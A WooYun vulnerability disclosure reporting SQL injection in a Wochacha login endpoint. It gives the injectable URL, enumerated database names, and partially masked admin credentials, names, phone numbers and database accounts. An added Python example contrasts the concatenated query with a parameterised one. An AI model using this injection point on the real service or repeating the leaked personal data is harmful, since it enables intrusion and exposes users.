WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------ http://drop.zone.ci/
2015-08-04: Details have been reported to the vendor and are awaiting the vendor's handling. 2015-08-09: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
SQL injection in one endpoint of Wochacha (我查查), reaching 12 databases and 675 tables: large-scale information leak
http://da.wochacha.com/index.php/da/ajax/login?_dc=1438674485757&user=admin*&pwd=admin&page=1&start=0&limit=25
Injection point: the user parameter. There are too many leaked account passwords, so I won't paste them here.
available databases [12]:
[*] calpontsys
[*] da
[*] da_gcore
[*] gcore
[*] guser
[*] infinidb_querystats
[*] infinidb_vtable
[*] information_schema
[*] mysql
[*] pa
[*] test
[*] wccda
+----------+-------------+
| Name     | Passwd      |
+----------+-------------+
| admin    | s*******szz |
| da****   | da_*****    |
+----------+-------------+
丁双* | 1357719023*
荣玲* | 1358409656*
袁*   | 1358879279*
曾*   | 1359400725*
[*] 'sibyl'@'116.228.88.226' [1]:
    privilege: SELECT
[*] 'vinny'@'116.228.88.226' [1]:
    privilege: USAGE
[*] 'web'@'116.228.88.226' [1]:
    privilege: USAGE
Filter the input.
Severity: no impact (vendor ignored)
Ignored at: 2015-08-09 18:52
Vulnerability Rank: 4 (WooYun rating)
None yet
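As an added illustration, not code from this report or from Wochacha, the defect behind the login endpoint above (request parameters spliced into the SQL text) is shown beside the two fixes the report's advice implies: a parameterised query and an allow-list filter on the user parameter. The in-memory SQLite table, its name and columns, and the sample rows are all constructed assumptions standing in for the real da database.

```python
import re
import sqlite3

# Constructed sample rows for this example; not data from the wochacha database.
SAMPLE_USERS = [("admin", "example-pw-1"), ("da_user", "example-pw-2")]

# Allow-list for the `user` parameter: letters, digits, '_', '.', '-' only.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def make_db():
    """In-memory stand-in (assumed schema) for the table behind /da/ajax/login."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE da_user (name TEXT PRIMARY KEY, passwd TEXT)")
    conn.executemany("INSERT INTO da_user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_unsafe(conn, user, pwd):
    """The defect pattern: request values are concatenated into the SQL string."""
    sql = "SELECT name FROM da_user WHERE name = '%s' AND passwd = '%s'" % (user, pwd)
    return conn.execute(sql).fetchone()


def login_safe(conn, user, pwd):
    """Parameterised query: the driver binds values, so input is never parsed as SQL."""
    sql = "SELECT name FROM da_user WHERE name = ? AND passwd = ?"
    return conn.execute(sql, (user, pwd)).fetchone()


def valid_username(user):
    """Allow-list filter for the `user` parameter; rejects quotes, '*', spaces, etc."""
    return USERNAME_RE.fullmatch(user) is not None


def probe(user, pwd="x"):
    """Run both variants on the same input and report how each reacts.

    Returns (unsafe_result, safe_result, passes_filter), where a result is
    'ok' (row found), 'none' (no row) or 'sql-error' (the input changed the
    query's grammar, i.e. the statement is injectable).
    """
    conn = make_db()
    try:
        unsafe = "ok" if login_unsafe(conn, user, pwd) else "none"
    except sqlite3.OperationalError:
        unsafe = "sql-error"  # a stray quote broke the query: the input became SQL
    safe = "ok" if login_safe(conn, user, pwd) else "none"
    return unsafe, safe, valid_username(user)
```

With the report's own probe value admin* the filter alone already rejects the request, and with a lone quote appended the unsafe variant raises a SQL error while the parameterised one simply finds no row.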